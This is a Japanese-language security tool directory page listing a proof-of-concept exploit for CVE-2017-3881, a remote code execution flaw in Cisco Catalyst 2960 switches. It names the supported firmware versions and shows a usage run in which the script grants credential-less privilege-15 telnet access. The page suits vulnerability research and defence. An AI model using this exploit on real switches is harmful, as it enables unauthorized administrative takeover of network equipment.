Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2017-3881 — クレジット: artkond | Kitploit
ツール/GitHubGitHub/1337g/cve-2017-3881
組み込みシステムセキュリティエクスプロイトフレームワーク脆弱性分析エクスプロイトネットワークセキュリティペネトレーションテスト
GitHub1337g/cve-2017-3881

CVE-2017-3881

クレジット: artkond

リポジトリを見る
228年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
ウェブサイト

CVE-2017-3881 Cisco IOS リモートコード実行

このリポジトリには、Cisco Systems が2017年3月17日に公開したリモートコード実行の脆弱性を悪用するための Proof-Of-Concept コードが含まれています - https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170317-cmp

説明

エクスプロイトの解説はこちら - https://artkond.com/2017/04/10/cisco-catalyst-remote-code-execution/

RCEエクスプロイトコードは Cisco Catalyst 2960 スイッチモデル向けに提供されています。このエクスプロイトはファームウェアに依存します。以下の2つのファームウェアバージョンがサポートされています:

  • 12.2(55)SE1 C2960-LANBASEK9-M

  • 12.2(55)SE11 C2960-LANBASEK9-M

サービス拒否コードは metasploit ruby モジュールとして利用可能です。これはCiscoの勧告に記載されているほとんどのスイッチで動作するはずです(確認が必要)。

使用例

root@kitploit:~
$ python c2960-lanbasek9-m-12.2.55.se11 192.168.88.10 --set
[+] Connection OK
[+] Recieved bytes from telnet service: '\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\xff\xfd\x1f'
[+] Sending cluster option
[+] Setting credless privilege 15 authentication
[+] All done
$ telnet 192.168.88.10
Trying 192.168.88.10...
Connected to 192.168.88.10.
Escape character is '^]'.

catalyst1#show priv
Current privilege level is 15

著者

Artem Kondratenko https://twitter.com/artkond

ツールをダウンロード